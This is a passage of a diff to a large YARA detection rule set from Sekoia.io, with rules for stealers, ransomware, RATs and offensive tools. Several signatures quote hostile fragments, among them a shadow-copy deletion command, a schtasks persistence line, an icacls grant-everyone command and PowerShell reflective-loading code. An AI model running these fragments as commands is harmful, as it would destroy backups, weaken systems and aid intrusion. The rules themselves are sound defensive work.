-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "704a31b0f7c30602305768f13bf6108ebaf08c62451833731d2f2f020efce386"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/crybercrime_prophetspider_proxy.yar#L3-L41"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "711ef3fc6ac488200415b7178c7f639ad9f6c72077bbebac2e6d5e0bed7120dd"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229221,59 +229810,81 @@ rule SEKOIA_Infostealer_Win_Lumma_Strings_Aug23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "lid=%s&j=%s&ver" ascii
-		$str02 = "%s (%d.%d.%d)" ascii
-		$str03 = "- Screen Resoluton:" ascii
-		$str04 = "- Physical Installed Memory:" ascii
-		$str05 = "Content-Type: attachment/x-object" ascii
-		$str06 = "Content-Type: application/x-www-form-urlencoded" ascii
-		$str07 = "Content-Type: multipart/form-data; boundary=%s" wide
-		$str08 = "SysmonDrv" wide
-		$str09 = "TeslaBrowser/5.5" wide
+		$ = { 56
+        57
+        48 8D 95 F0 FE FF FF
+        31 C0
+        66 21 02
+        48 89 CE
+        AC
+        48 89 D7
+        4C 89 C2
+        88 D4
+        30 C2
+        0F B6 CA
+        48 89 95 E8 FE FF FF
+        AC
+        30 E0
+        AA
+        E2 FA
+        88 C8
+        AA
+        48 8D 85 F0 FE FF FF
+        48 8B 95 E8 FE FF FF
+        5F
+        5E
+        C3 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		uint16be( 0 ) == 0x4d5a and ( all of them or pe.imphash ( ) == "55e0b8e5b4d787c680ada4e450789a4d" )
 }
-
-rule SEKOIA_Loader_Win_Ninerat
+rule SEKOIA_Ransomware_Win_Agenda : FILE
 {
 	meta:
-		description = "Detect the NineRAT instrumentator"
+		description = "Finds Agenda ransomware (aka Qilin) samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "b9aa3ddc-7892-402f-b045-182884ee9bad"
-		date = "2023-12-12"
+		id = "b0ea8e69-8f29-452f-95f7-67ee0e545b66"
+		date = "2022-12-15"
 		modified = "2024-12-19"
-		reference = "https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_ninerat.yar#L4-L37"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "eab81277a2ffe926c2d9f990ee2e36f0e5f27a14d3048c50d31952d90ce7ab0b"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_agenda.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7e315f639c4d785639bf7ed3bd805551366b4da10a664a42bf801c54c6f7bd2d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4"
-		hash2 = "5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541"
 
 	strings:
-		$ = "TelegramRat\\lastest\\Dropper"
-		$ = "\\Release\\ServiceMid.pdb"
+		$str00 = "\"note\": \"-- Qilin" ascii
+		$str01 = "README-RECOVER-.txt" ascii
+		$str02 = "\"file_black_list\": [" ascii
+		$str03 = "\"file_pattern_black_list\": [" ascii
+		$str04 = "Encrypted files have new extension." ascii
+		$str05 = "We have downloaded compromising and sensitive data from you system/network" ascii
+		$str06 = "Employees personal dataCVsDLSSN." ascii
+		$str07 = "ueegj65kwr3v3sjhli73gjtmfnh2uqlte3vyg2kkyqq7cja2yx2ptaad.onion" ascii
+		$str08 = "cmdvssadmin.exe delete shadows /all /quiet" ascii
+		$str09 = "[WARNING] Removing shadows failed." ascii
+		$str10 = "[INFO] Shadow copies removed" ascii
+		$str11 = "[WARNING] net sahre enum failed with:" ascii
 
 	condition:
-		all of them or pe.imphash ( ) == "104a3dc970a385f64de39e0dad61a9a2" or hash.md5 ( pe.rich_signature.clear_data ) == "aab0aa6b89d883e42be8b65a4e41a139" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "827d5fd4b1a0426037529ee9bba48da0" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "82354f92508dcb33acda01c226de2975" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ccd0f5d837a6cc05a861f040cbdfe080" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "8d2c169356afe8b53b0ecb83de3084b9" )
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule SEKOIA_Crime_Sload_Vbs_Downloader_Strings_1 : FILE
+rule SEKOIA_Tool_Koblas_Server_Strings : FILE
 {
 	meta:
-		description = "Detects an sLoad downloader based on strings"
+		description = "Detects Koblas server"
 		author = "Sekoia.io"
-		id = "77ff0d21-9249-43b2-9a6d-87988a2dec3b"
-		date = "2022-08-02"
+		id = "ebd891da-69dd-474c-9e08-63d0b4cc654e"
+		date = "2024-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/crime_sload_vbs_downloader_strings_1.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "06e4fcb6c48078c6c44d779820fc901b0f335b9495097ed28206826a959d0712"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_koblas_server_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "590f3f71564c347be7b3b2a583606c3854744d0023cde464374cd7b61ec5a2d7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229281,147 +229892,185 @@ rule SEKOIA_Crime_Sload_Vbs_Downloader_Strings_1 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "On Error Resume Next"
-		$ = {0A [4] 3D 41 72 72 61 79}
-		$ = { 2E 50 61 74 74 65 72 6E 20 3D 20 22 28 [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C }
+		$ = "sent {sent} bytes and received {received} bytes" wide ascii
+		$ = "connection denied" ascii
+		$ = "loaded {} users" ascii
+		$ = "listening on {}:{} for incoming connections" ascii
 
 	condition:
-		all of them and filesize < 20KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them
 }
-rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc : FILE
+rule SEKOIA_Infostealer_Win_Monster_Stub : FILE
 {
 	meta:
-		description = "Detects some suspected APT28 document"
+		description = "Finds Monster Stealer stub (Python payload) based on specific strings."
 		author = "Sekoia.io"
-		id = "2b9d597a-a6cd-49df-8938-7103342a1d06"
-		date = "2024-07-25"
+		id = "10d27d49-79ae-4edc-8c30-35506bdf2c42"
+		date = "2024-08-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_susp_apt28_uac0063_malicious_doc.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "93322be0785556e627d2b09832c18e39c115e6a6fbff64b1e590e1ddcf8f6a43"
-		logic_hash = "27aeadbb76dd4e670a85e8fcd1e885b69845537dd937aacc1808902e75008848"
-		score = 65
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_monster_stub.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d6362c54b1f56ffa878423fbb1a3f57508d20e06b573c732f892494178a49200"
+		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Sub pop() : : End Sub" ascii fullword
-		$ = "%localappdata%\\Temp" ascii fullword
-		$ = "rthedbv" ascii fullword
+		$str01 = "https://t.me/monster_free_cloud" ascii
+		$str02 = "MonsterUpdateService" ascii
+		$str03 = "Monster.exe" ascii
+		$str04 = "schtasks /create /f /sc daily /ri 30 /tn" ascii
+		$str05 = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\" ascii
+		$str06 = "banned_uuids" ascii
+		$str07 = "banned_computer_names" ascii
+		$str08 = "banned_process" ascii
+		$str09 = "register_X_browsers" ascii
+		$str10 = "register_payload" ascii
+		$str11 = "tiktok_sessions.txt" ascii
+		$str12 = "spotify_sessions.txt" ascii
+		$str13 = "network_info.txt" ascii
+		$str14 = "lolz.guru" ascii
+		$str15 = "echo ####System Info####" ascii
+		$str16 = "echo ####Firewallinfo####" ascii
+		$str17 = "/injection/main/injection.js" ascii
 
 	condition:
-		2 of them and filesize < 1MB
+		uint16( 0 ) == 0x5A4D and 10 of them
 }
-rule SEKOIA_Infostealer_Win_Cinoshistealer : FILE
+rule SEKOIA_Implant_Win_Quasarrat
 {
 	meta:
-		description = "Finds Cinoshi Stealer samples based on specific strings, or PE resources"
+		description = "Detect QuasarRAT (reted from samples 2023-03)"
 		author = "Sekoia.io"
-		id = "2e9c066b-d5e3-4a25-8954-c10af285bcd3"
-		date = "2023-06-23"
+		id = "492fdffc-8e5f-4225-a2eb-cd6d80e6bcb8"
+		date = "2023-03-17"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_cinoshistealer.yar#L1-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c4d8418a7bd1bf205295100d993562c89b17b80889cad5aac7a74f89e66543ce"
+		reference = "https://blog.alyac.co.kr/5103"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_quasarrat.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d3c1d65a23aaea5423025cb2f755d0f2298cbf02b2a4e34430eae8c3e1263185"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Anaida.exe" ascii wide
-		$str02 = "Anaida.pdb" ascii
-		$str03 = "embedder_download_data" ascii
-		$str04 = "date_password_modified" ascii
-		$str05 = "card_number_encrypted" ascii
-		$str06 = "set_UseZip64WhenSaving" ascii
-		$str07 = "set_CommandText" ascii
-		$str08 = "Nss3CouldNotBeLoaded" ascii
-		$str09 = "formhistory.sqlite" wide
-		$str10 = "logins.json" wide
-		$str11 = "\\nss3.dll" wide
-		$str12 = "\\cookies.sqlite" wide
-		$str13 = "\\places.sqlite" wide
-		$str14 = "\\autofill-profiles.json" wide
+		$ = {63 00 68 00 63 00 70 00 20 00 36 00 35 00 30 00 30 00 31 00}
+		$ = {65 00 63 00 68 00 6f 00 20 00 44 00 4f 00 4e 00 54 00 20 00 43 00 4c 00 4f 00 53 00 45 00 20 00 54 00 48 00 49 00 53 00 20 00 57 00 49 00 4e 00 44 00 4f 00 57 00 21 00}
+		$ = {70 00 69 00 6e 00 67 00 20 00 2d 00 6e 00 20 00 31 00 30 00 20 00 6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 20 00 3e 00 20 00 6e 00 75 00 6c 00}
+		$ = {64 00 65 00 6c 00 20 00 2f 00 61 00 20 00 2f 00 71 00 20 00 2f 00 66 00 20 00 22 00}
+		$ = "DoShellExecute"
+		$ = "DoDownloadFile"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 9 of them and filesize > 400KB
+		all of them
 }
-
-rule SEKOIA_Backoor_Win_Tinyturla_Ng : FILE
+rule SEKOIA_Tool_Realblindingedr_Strings : FILE
 {
 	meta:
-		description = "Detect the TinyTurla-NG backdoor used by Turla"
+		description = "Detects RealBlindingEDR based on strings"
 		author = "Sekoia.io"
-		id = "019043bb-0212-4b73-bc93-03e9a746d28d"
-		date = "2024-03-04"
+		id = "505dcbee-ae37-47c1-a322-2c52d10e68d7"
+		date = "2024-09-11"
 		modified = "2024-12-19"
-		reference = "https://blog.talosintelligence.com/tinyturla-next-generation/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backoor_win_tinyturla_ng.yar#L3-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a2fe2187e0cdd02fa31cbbecd600d044d4d12788ea6f76086aef7e77cbf232a0"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_realblindingedr_strings.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "cb6219e2b6577b8d4a18114d595e10d7"
+		hash = "d0a251709c24a8f4c26d456dea22d90f"
+		logic_hash = "7b6a54c935bb40bd1be1d25be452d7185fd6f9dacbd7cbcde7cb37dfea09775e"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b"
-		hash2 = "d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40"
 
 	strings:
-		$ = "delkill /F /IM explENT_USER\\Softwar"
-		$ = "Set-PSReadLineOption -HistorySaveStyle SaveNothing"
-		$ = "changeshell"
-		$ = "chcp 437 > $null"
-		$ = "powershell.exe -nologo"
+		$ = "Unload Driver Error 1"
+		$ = "Failed to create pipe. Error %d"
+		$ = "icacls \"%s\" /grant Everyone:(F)"
+		$ = "Register MiniFilter Callback driver:"
+		$ = "The driver's certificate has been revoked,"
+		$ = "[Success] Killed %s(%s)."
+		$ = "ntoskrnl.exe base address not found."
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them or pe.imphash ( ) == "2240ae6f0dcbc0537836dfd9205a1f2b"
+		uint16be( 0 ) == 0x4d5a and 4 of them
 }
-rule SEKOIA_Apt_Suspected_Sandworm_Sdelete_Wiper : FILE
+rule SEKOIA_Tool_Ladon_Strings : FILE
 {
 	meta:
-		description = "Detects Sdelete wiper"
+		description = "Detects Ladon based on strings"
 		author = "Sekoia.io"
-		id = "c1419b11-33e5-4280-b92a-039719cb17d3"
-		date = "2023-10-25"
+		id = "7f06f755-a103-4e74-a9df-136355775233"
+		date = "2024-06-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_suspected_sandworm_sdelete_wiper.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "094b946b89cfb475b8692f88af73fa8768a933139e0df9d6e7d7aa8614d3ab14"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_ladon_strings.yar#L1-L61"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6f2a34bddea2a2370c0a45cde888f51632689973373e3c6ba739a34dc220bfa1"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = ".exe -accepteula -r -s -q" wide
-		$s2 = "sdelete [-p passes] [-r]" wide
-		$s3 = "!This program cannot be run in DOS mode."
+		$a1 = ".GetType('Ladon.Scan')"
+		$a2 = "= New-object Byte[]("
+		$a3 = "([IO.MemoryStream][Convert]::FromBase64String("
+		$b1 = "DeflateStream([IO.MemoryStream][Convert]::FromBase64String("
+		$b2 = "))}}}}}}}}}"
+		$b3 = "::Main(@($"
+		$b4 = "))} else {If("
+		$b5 = "= [Reflection.Assembly]::Load("
+		$c1 = "ChatLadon.Form1.resources"
+		$c2 = "ChatLadon.Properties.Resources.resources"
+		$c3 = "WebClientUploadEvent"
+		$c4 = "WebClientDownloadEvent"
+		$c5 = "K8robot"
+		$c6 = "K8IPselect"
+		$d1 = "loadASM"
+		$d2 = "ConsoleApp1.exe"
+		$d3 = "K8Ladon"
+		$e1 = "get_network_16px_1219919_easyicon_net"
+		$e2 = "K8gege"
+		$e3 = "LadonExpBuild"
+		$f1 = "Ladon url.txt CitrixVer"
+		$f2 = "Ladon MssqlCmd"
+		$f3 = "Example: Ladon "
+		$f4 = "k8gege.org"
+		$f5 = "K8crack"
+		$g1 = "LadonStudy.exe"
+		$g2 = "LadonStudy.frmMain.resources"
+		$g3 = "LadonStudy.Properties.Resources.resources"
+		$g4 = "K8gege"
+		$h1 = "LadonShell.exe" wide
+		$h2 = "ForceRemove"
+		$h3 = "GetUserObjectInformationA"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and $s1 and $s2 and #s3 == 2 and filesize < 500KB
+		( all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* ) or all of ( $e* ) or all of ( $f* ) or all of ( $g* ) or all of ( $h* ) ) and filesize < 5MB
 }
-rule SEKOIA_Malicious_Lnk_Exploiting_Webdav_Share_Generic : FILE
+rule SEKOIA_Apt_Kimsuky_Klogexe : FILE
 {
 	meta:
-		description = "Detects some malicious LNK"
+		description = "Detects KLogExe, a keylogger used by Kimsuky"
 		author = "Sekoia.io"
-		id = "b228643c-ab23-46e1-b170-3da6bcb2dd23"
-		date = "2024-11-22"
+		id = "f6e3b1a5-43b6-4dac-83c2-a365c41de38d"
+		date = "2024-09-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malicious_lnk_exploiting_webdav_share_generic.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "cffb40e13e3aa6761330090b42314c36"
-		logic_hash = "8179ef8ac43cb67a1b70baf7824452834f498d988df84e138c857ac0ef164b4b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_klogexe.yar#L1-L32"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "e1d683ee1746c08c5fff1c4c2b3b02f0"
+		hash = "90946c6358eacd119fe1eb36ec7a0a18"
+		hash = "9760f489a390665b5e7854429b550c83"
+		logic_hash = "4b616908ceacd85c5d8b527cd1a718082c709071dc1fa9c9ccc96e71dc4e7449"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229429,26 +230078,32 @@ rule SEKOIA_Malicious_Lnk_Exploiting_Webdav_Share_Generic : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "powershell.exe" wide
-		$ = "-Name explorer; \\\\" wide
-		$ = "@80\\"
-		$ = "desktop-tcrdu4c"
+		$event = "Norton_BreakHelper" ascii wide
+		$log = "------ %d/%d/%d : %d/%d ------" ascii wide
+		$keylog_1 = "[RM+]"
+		$keylog_2 = "[Tab+]"
+		$keylog_3 = "[Home+]"
+		$keylog_4 = "[End+]"
+		$keylog_5 = "[clip_s]: %s "
+		$keylog_6 = "%s[Too many clip_tail]"
+		$keylog_7 = "%s[F%d]"
+		$user_agent = "Chrome/31.0." wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and 2 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 600KB and 8 of them
 }
-rule SEKOIA_Hacktool_Ipmipwner_Strings : FILE
+rule SEKOIA_Tool_Sharphoundexecutable_Strings : FILE
 {
 	meta:
-		description = "Detects ipmiPwner script"
+		description = "Detects the SharpHound tool"
 		author = "Sekoia.io"
-		id = "2ac736b5-33bb-477f-a98c-57cc2744d251"
-		date = "2023-12-08"
+		id = "2cf8046e-5b4d-4ff7-b4b2-7aaeaf58883b"
+		date = "2022-08-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_ipmipwner_strings.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "122311e1791d018f08f3d5ecdf2e0efe3aa5bb913b2c1ce6a3797e8ceb2676eb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_sharphoundexecutable_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1b28a2b9dd594f344a1a2a74fd9b30527a66dabb451b21afca40a0e6ec8d3553"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229456,111 +230111,100 @@ rule SEKOIA_Hacktool_Ipmipwner_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "{status} Using the list of users that the {lgcyan}script"
-		$ = "--host 192.168.1.12 -p 624 -uW /opt/SecLists/Usernames/"
+		$ = "BloodHoundLoopResults.zip" wide
+		$ = "[-] Removed PSRemote Collection" wide
+		$ = "Initializing SharpHound at {time} on {date}" wide
+		$ = "[SearchForest] Cross-domain enumeration may result in reduced data quality" wide
+		$ = "SharpHound Enumeration Completed at {Time} on {Date}! Happy Graphing!" wide
+		$ = "Consumer task on thread {id} completed" wide
 
 	condition:
-		all of them and filesize < 10KB
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Apt_Gamaredon_Gamaredon_Lnk_Usb_Spreader
+rule SEKOIA_Apt_Oilrig_Odagent_Strings : FILE
 {
 	meta:
-		description = "Detects Gamaredon LNK USB Spreader"
+		description = "Detects ODAgent malware based on strings"
 		author = "Sekoia.io"
-		id = "a0972e30-bfc5-48ff-b04b-382db8c08a54"
-		date = "2023-06-19"
+		id = "1c5c0eb5-7c6f-4a34-b2e2-4a7c6d7030d6"
+		date = "2023-12-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_gamaredon_lnk_usb_spreader.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581"
-		logic_hash = "3adb2433eda559d9b32316f4733741b0fc8c576937b1decede8bc7d23b203a0e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_oilrig_odagent_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "14a1399ff3519632e3bbb6eea0d44e9908cfc03728bd26f610ab75fff6a8d2c6"
 		score = 75
-		quality = 64
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".CREatesHoRTCUt(" nocase ascii wide
-		$ = "cOPY-Item $enV:UsErprOfilE" nocase ascii wide
-		$ = "-dEsTInaTioN $Env:" nocase ascii wide
-		$ = " = GET-ChilDITem $drivE.nAMe" nocase ascii wide
-		$ = "STArt-SLEeP" nocase ascii wide
-		$ = "-eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy" nocase ascii wide
-		$ = "drIvETYPe='2'" nocase ascii wide
-		$ = ".iConloCaTiON = " nocase ascii wide
+		$ = "application/x-www-form-urlencoded" ascii wide
+		$ = "dly>" ascii wide
+		$ = "DELETE" ascii wide
+		$ = "nok!" ascii wide
+		$ = ".c:/content" ascii wide
 
 	condition:
-		7 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
 }
-rule SEKOIA_Apt_Lazarus_Backdoored_Jslib : FILE
+
+rule SEKOIA_Apt_Windows_Wip19_Screencap : FILE
 {
 	meta:
-		description = "Detects InvisibleFerret based on common ressource."
+		description = "Detects ScreenCap resource"
 		author = "Sekoia.io"
-		id = "73ffd449-93c8-494e-9c14-2e933b21a200"
-		date = "2024-10-28"
+		id = "ebf5d2c5-81c9-45c3-aa61-05870f800f6b"
+		date = "2022-10-18"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_lazarus_backdoored_jslib.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "52e92be527690f4e63608cbc699e2f70"
-		logic_hash = "205ad321afcb22ae2bf6cf2a58ce970ea9b0edda7fab60ddeda5ea36ecfe3cb9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_windows_wip19_screencap.yar#L4-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "02479f0c8199b31f089608da0f44f1487b75790cb31c77bb65ca1fb0fd57ac0d"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$obf = "(function(_0x" ascii
-		$exp = "module.exports =" ascii
-
 	condition:
-		$exp in ( filesize -500 .. filesize ) and #obf == 1
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "89f4d0e3f7f3318270aa9c8345c1402202b1a02ffefc03c7a86636e297aa0ffc" ) and filesize < 2MB
 }
-rule SEKOIA_Implant_Win_Quasarrat
+
+rule SEKOIA_Ransomware_Win_Eking_Rich_Header
 {
 	meta:
-		description = "Detect QuasarRAT (reted from samples 2023-03)"
+		description = "Detect Eking ransomware using its rich header"
 		author = "Sekoia.io"
-		id = "492fdffc-8e5f-4225-a2eb-cd6d80e6bcb8"
-		date = "2023-03-17"
+		id = "9fe76f89-f27a-4a47-a61c-2d767a1a8acb"
+		date = "2021-10-07"
 		modified = "2024-12-19"
-		reference = "https://blog.alyac.co.kr/5103"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_quasarrat.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d3c1d65a23aaea5423025cb2f755d0f2298cbf02b2a4e34430eae8c3e1263185"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_eking_rich_header.yar#L4-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0028200fc2e929dba6fcc4ddf5d8e07825842e2f65c69ad94ebd032ae3748c90"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = {63 00 68 00 63 00 70 00 20 00 36 00 35 00 30 00 30 00 31 00}
